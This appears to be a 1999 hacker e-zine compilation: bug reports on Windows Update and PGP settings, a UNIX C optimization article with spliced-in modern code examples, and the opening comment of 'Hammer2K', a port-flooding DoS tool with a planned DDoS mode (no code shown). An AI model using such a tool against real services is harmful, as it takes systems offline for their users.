    Windows NT 4.0 Service Pack 5 (128 bit strong encryption)
    456 KB / Download Time: < 1 min
    Windows NT 4.0 Service Pack 5 includes the most recent updates and enhancements to Windows NT Server 4.0 and Windows NT Workstation 4.0. Service Pack releases are cumulative, so Service Pack 5 contains all previous Service Pack fixes and any new fixes created after Service Pack 4. Note that the actual download will be anywhere from 11-32Mb depending on the actual files on your current machine. This release features 128 bit strong encryption and can only be downloaded within the United States and Canada

--> I clicked to check Windows NT 4.0 Service Pack 5 (128 bit strong encryption)
--> I clicked on the Download (blue) button to start download

    Product Updates
    Download Checklist
    1 Confirm Selections
    You have chosen to install the following software. You can deselect any of the components you do not want to install by clearing the check box.
    Total Size: 456 KB  Download Time: < 1 min
    Windows NT 4.0 Service Pack 5 (128 bit strong encryption)
    456 KB / Download Time: < 1 min
    2 View Instructions?
    View a single, combined instruction page for all of the software you have
    chosen to install. You may want to print these instructions for later
    reference.
    View Instructions
    3 Start Download
    Download and install the software shown above.

--> I clicked Start Download
--> I got another window:
    SUPPLEMENTAL END USER LICENSE AGREEMENT FOR MICROSOFT SOFTWARE
    IMPORTANT: READ CAREFULLY -
--> I clicked YES
    After downloading the file, I got another, HAHAHA nice:
    Service Pack Setup Error (modal window)
    "The version of Windows NT you have installed is more current than the
    update you are trying to install"
    WITH THE OK button
--> I clicked OK
--> I got:
    Product Updates
    Download and Installation Successful
    SUCCESSFUL
    The following software was successfully downloaded and installed.
    Windows NT 4.0 Service Pack 5 (128 bit strong encryption)

HAHA now let me tell you what I see wrong in that:

1- The updates did not install, so I should not be getting "Download and
   Installation Successful SUCCESSFUL".
2- Why did the script not detect that I have SP6 when it started? Bah... they
   should be checking first, and when they find that I have SP6, they should
   not propose the option of getting the patch "Windows NT 4.0 Service Pack 5
   (128 bit strong encryption)".

I did not try this on Win9x, or other IE.

Cheers,
+-------------oOo-(NtWaK0)(Telco. Eng. MCSE.Etc..)-oOo-------------+
+--oOo-"---------------------------------------------------"-oOo---+
Live Well Do Good --:)

================================================================================

Subject: PGP 6.5.2 for Windows will change some security settings if you
re-install it
Tuesday, December 07, 1999

Tested on NT 4.0 + SP6 + IE5.01

Today I had a funny problem with PGP 6.5.2. I was working and decided to wipe
out some files.

--> I selected the files to wipe out
--> Right clicked on the selected files, and clicked PGP then clicked Wipe
--> Hmm funny, the PGP Wipe dialog box came up but EMPTY.
--> I thought I am too much baked ;) but I did it again and selected other
    files in the same directory
--> Hmm funny, the PGP Wipe dialog box came up but EMPTY.
--> Well, I decided to re-install PGP 6.5.2
--> After the install I still cannot wipe the files.
--> I continued working and wiped the files using the PGP tool menu, heh, that
    works
--> After some time I decided to find out how come that sh** is not working.
--> So I selected one file from the same directory as before, and right clicked
    the file then Properties
--> Hmm, the file is READ Only, so I checked that OFF
--> Right clicked on the selected files, and clicked PGP then clicked Wipe
--> It worked ;) I was able to wipe the file.

So when the file is read only, PGP does not display it in the Wipe dialog box.

Now after I re-installed PGP, hehe for nothing, I opened my e-mail, Outlook
2000, and sent some e-mails. Hrmm, when I clicked the SEND button I noticed
something funny. I SIGN all my e-mail and when I clicked SEND I did not get the
SIGN dialog box to type in my pass phrase, so I said heh, PGP changed my
settings. So from the Outlook 2000 menu I clicked PGP then Options then the
E-mail tab, and under e-mail options "Sign new messages by default" was
UNCHECKED. And I am like 100% sure I had it checked before.

I consider this a security issue and here is why:
Imagine you did that, re-installed PGP, and you had your settings to sign all
your mail by default, and after you re-installed you SENT THE MOST LEGAL ELITE
mail and you clicked SEND and you did not realize that the mail was not signed.
So one day you need that mail as proof, but you open the mail and you were
like 100% sure it was signed by you, but you could not find the signature ;)
I am sure situations like this will get you mad.

[Optimizing UNIX C]==========================================================[S]

Possessing UNIX C optimization skill can prove to be useful in many situations.
An enumeration of such instances follows:

  - Resource intensive projects
  - Writing code to be executed on a slow processor
  - Interactive web sites for use by the masses
  - Obsession with elegance

This abridged document is by no means a definitive reference; it is only an
introduction. The "Resources" section appended to this document contains other
quality sources. My personal interest in C optimization began as the result of
this proprietary programming endeavor:
http://www.freezersearch.com/index.cfm?aff=dhc

Buffering I/O
-------------

Minimizing I/O can improve code performance significantly, especially when
dealing with disks. Buffering I/O will reduce a disk's workload and the number
of system calls that need to be executed. Take the following pseudo-code that
reads 1024 bytes, for example:

    while(cnt<1024){
        ...
        read(fd,&c,1);
        ...
    }

    read(fd,&buf,1024);

In the first model, 1,024 system calls have to be made and a separate disk
operation has to be made for each one of those. In other words, the hard drive
platters have to spin to the requested position of the file on disk for each
individual read() call.
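As an added example (not from the original article), here is a C program that measures what the pseudo-code above costs: it builds a constructed 65535-byte test file and counts the read() calls needed at several buffer sizes, looping on short reads instead of assuming one read() fills the buffer. The temp-file prefix and the helper names are my own.

```c
#define _XOPEN_SOURCE 700      /* mkstemp(), ssize_t */
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Constructed input: a temp file holding `size` bytes of 'A'.
 * path_out needs 32 bytes; returns it, or NULL on failure. */
char *make_test_file(size_t size, char *path_out) {
    strcpy(path_out, "/tmp/kv_bufXXXXXX");
    int fd = mkstemp(path_out);
    char *data = fd < 0 ? NULL : malloc(size);
    if (!data) { if (fd >= 0) close(fd); return NULL; }
    memset(data, 'A', size);
    ssize_t w = write(fd, data, size);   /* regular file: completes in one call */
    free(data);
    close(fd);
    return w == (ssize_t)size ? path_out : NULL;
}
/* Read the file `bufsz` bytes at a time until read() returns 0 (EOF).
 * Returns the number of read() calls made, or -1 on error; *total gets the
 * byte count. A short read is normal, so never assume one call fills buf. */
long count_reads(const char *path, size_t bufsz, size_t *total) {
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    char *buf = malloc(bufsz);
    if (!buf) { close(fd); return -1; }
    long calls = 0;
    *total = 0;
    for (;;) {
        ssize_t n = read(fd, buf, bufsz);
        calls++;
        if (n < 0) { calls = -1; break; }   /* I/O error */
        if (n == 0) break;                  /* EOF */
        *total += (size_t)n;
    }
    free(buf);
    close(fd);
    return calls;
}
/* read() calls needed to consume a file_size-byte file through a bufsz buffer:
 * 1-byte reads cost file_size+1 calls, a 4 KB buffer about file_size/4096+1. */
long reads_for(size_t file_size, size_t bufsz) {
    char path[32];
    size_t total = 0;
    if (!make_test_file(file_size, path)) return -1;
    long calls = count_reads(path, bufsz, &total);
    unlink(path);
    return total == file_size ? calls : -1;
}
```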
Here's a real-world example of buffering efficiency:

[super@ufo super]$ perl -e 'print "A"x65535;' > /tmp/test
[super@ufo super]$ cat prog1.c
#include<stdlib.h>
#include<fcntl.h>
#include<unistd.h>   /* read() */

int main(void){
    int fd;
    unsigned char c;
    register unsigned short cnt;

    if((fd=open("/tmp/test",O_RDONLY))<0){
        exit(EXIT_FAILURE);
    }
    /* one system call (and, per the author, one disk operation) per byte */
    for(cnt=0;cnt<65535;cnt++){
        read(fd,&c,1);
    }
    exit(EXIT_SUCCESS);
}
[super@ufo super]$ cc -o prog1 prog1.c
[super@ufo super]$ cat prog2.c
#include<stdlib.h>
#include<fcntl.h>
#include<unistd.h>   /* read() */

int main(void){
    int fd;
    char buf[65535];

    if((fd=open("/tmp/test",O_RDONLY))<0){
        exit(EXIT_FAILURE);
    }
    /* one system call for the whole file */
    read(fd,buf,65535);
    exit(EXIT_SUCCESS);
}
[super@ufo super]$ cc -o prog2 prog2.c
[super@ufo super]$ time ./prog1
0.06user 0.05system 0:00.10elapsed 108%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (75major+9minor)pagefaults 0swaps
[super@ufo super]$ time ./prog2
0.00user 0.00system 0:00.00elapsed 0%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (75major+24minor)pagefaults 0swaps

Buffer efficiency is noticeable even at 448.92 BogoMIPS. Obviously, prog1 is
frivolously wasting resources. Although prog2 has to allocate memory for the
character array, this is a fair trade for extraneous disk activity and wasted
CPU cycles. Most buffers will have a short lifespan and may be freed rather
quickly. Thus, the used memory will have little or no effect on operation.

Be careful when utilizing this technique. If any of the memory space of the
allocated buffer is swapping, this method's purpose has been defeated: why read
from the disk into a buffer when an immediate write of that identical data back
to disk (the swap) is pending? In short, don't use excessively large buffers.

Loop unrolling
--------------

Loop unrolling is the expansion of consolidated recurring code. A decent amount
of processing can be eradicated by spreading out loop code. Loop unrolling cuts
back on incremental math, memory used by integers for counting, and the ASM
branch instructions that implement the loop (JMP, JBE, etc.).
    /* Hence, */
    while(cnt<1000){
        puts("Hello World");
        puts("Hello World");
        puts("Hello World");
        puts("Hello World");
        puts("Hello World");
        puts("Hello World");
        puts("Hello World");
        puts("Hello World");
        puts("Hello World");
        puts("Hello World");
        cnt+=10;
    }

    /* is superior to */
    while(cnt<1000){
        puts("Hello World");
        cnt++;
    }

Lazy programmers may use the -funroll-loops option of egcs.

Bitfields
---------

Often, a coder may need to set an on/off flag for use in a conditional
statement. The disturbing part is that most coders declare an integer with
which to do this. How stupid. How lame. How wasteful. This has already been
done with base 2 (binary). Instead of allocating the sizeof(int), usually four
bytes (32 bits), perform the operation with a single bit. This can be
accomplished using structures.

    struct bitfields {
        unsigned int flag1 : 1;   /* unsigned: a signed 1-bit field holds only 0 and -1 */
    };

The preceding structure declaration tells the compiler to set aside one bit for
the flag1 variable. This syntax may also be applied when declaring an integer
with a known value limit. For example, a variable used for counting that never
exceeds 15 would only need a nibble to do its job. Therefore, it may be declared
within a structure as so: "int flag : 4;". Anyone with a bits and bytes
mentality knows that a nibble is half a byte. On most architectures, a byte is
8 bits so a nibble is 4 bits. Only 4 bits are needed to count to fifteen because
of binary fundamentals: 1 + 2 + 4 + 8 = 15.

LWPs
----

Lightweight processes, otherwise known as threads, can make use of the wasted
time that a program spends blocking, or sitting idle while waiting for a
certain event. Additionally, threads can extinguish the overhead of creating a
new, "heavyweight" process. Lightweight processes share memory space with the
main process, consequently throwing IPC (Inter-Process Communication) out the
window. Hence, the Linux move towards clone().
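An added example, not part of the original article, that puts the Bitfields section above to the test: it packs four flags and a 4-bit counter into one struct, compares the storage against one int per flag, and exercises two edge cases the text does not mention, a signed 1-bit field (which cannot hold the value 1) and a nibble counter that silently wraps past 15. The struct and function names are my own.

```c
#include <stddef.h>

/* Constructed example: four on/off flags and a 0..15 counter packed together.
 * Unsigned on purpose: an unsigned N-bit field holds 0 .. 2^N-1. */
struct packed_flags {
    unsigned int verbose : 1;
    unsigned int dryrun  : 1;
    unsigned int debug   : 1;
    unsigned int quiet   : 1;
    unsigned int retries : 4;   /* the nibble from the text: counts to 15 */
};

/* The same data the way the text complains about: one int per flag. */
struct unpacked_flags {
    int verbose, dryrun, debug, quiet, retries;
};

/* Bytes saved by packing; the whole packed struct fits one unsigned int. */
size_t bytes_saved(void) {
    return sizeof(struct unpacked_flags) - sizeof(struct packed_flags);
}

/* Edge case 1: a *signed* 1-bit field has one value bit and it is the sign
 * bit, so storing 1 reads back as -1 on two's-complement compilers, never 1. */
int signed_one_bit_holds_one(void) {
    struct { signed int bit : 1; } s;
    int one = 1;         /* via a variable so the compiler cannot warn it away */
    s.bit = one;
    return s.bit == 1;   /* 0: the "flag" silently came back as -1 */
}

/* Edge case 2: incrementing the 4-bit counter past 15 wraps modulo 16
 * without any warning, so a retry limit of 16 could never be reached. */
unsigned int retries_after(unsigned int increments) {
    struct packed_flags f = {0};
    while (increments-- > 0)
        f.retries++;
    return f.retries;
}

/* A flag set through the bitfield reads back as exactly 1, and the other
 * bits of the shared storage unit are untouched. */
int set_and_test_quiet(void) {
    struct packed_flags f = {0};
    f.quiet = 1;
    return f.quiet == 1 && f.verbose == 0 && f.retries == 0;
}
```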
Optimization through debugging
------------------------------

Examining the output of programs such as strace, ltrace, ktrace, and truss can
aid in the discovery of superfluous system and library calls, ASM commands, etc.
In general, the less output generated by a tracing debugger, the more efficient
the code.

Ramdisks
--------

A ramdisk, as the name implies, is a filesystem in RAM. Ramdisks have a
multitude of optimization applications; the implementation of a speedy cache
system and minimizing the cost of dynamic configuration files, to name a few.
Any sensible computer user knows that reading from RAM is remarkably faster than
reading from disk. A summarization of ramdisk usage will not be provided. Other
documents fully address this subject.

Registers
---------

Variables with frequent usage should be declared with the register keyword;
examples are loop counters and character pointers used for intricate lexical
analysis. A classic case is illustrated in the "Buffering I/O" section above.
This rule of thumb should be known by programmers even with a rather small
amount of experience with C.

Resources
---------

FTP: ftp.debian.org /debian/dists/unstable/main/source/utils/ltrace_*
FTP: scitsc.wlv.ac.uk /pub/cprog/prog.course.wlv./chapter.12
WWW: http://rpmfind.net/linux/RPM/Development_Debuggers.html
WWW: http://centaurus.cs.umass.edu/~wagner/threads_html/tutorial.htm
WWW: http://www.abarnett.demon.co.uk/tutorial.html
USENET: comp.lang.c, comp.programming.threads
Manual pages: ltrace(1), strace(1), ktrace(1), truss(1)

[Hammer2K]===============================================================[Threx]

/*
   Hammer2K ver 1.0 BETA by Threx (threx@attrition.org)

   I'm new to socket programming... So bear with me.

   Hammer2K is a simple DoS attack tool that will kill a port by rapidly
   opening a port and sending a burst of data. It affects major ports such as
   telnet, finger, and smtp. Because inetd checks the status of these ports,
   it will restart in 10 minutes.
   So, I have armageddon mode that will keep killing it for an hour.

   Problems: If the victim has more bandwidth, it can't be killed. You can
   have a group of people to take it out, but I haven't tested that theory.

   Coming Up: Hammer2K will soon be a DDoS attack tool. Hopefully more ports
   will be found that are affected.

   Compile: gcc hammer2k.c -o hammer2k

   Greets: #svun on undernet, LoU, APHC <aphc.cjb.net>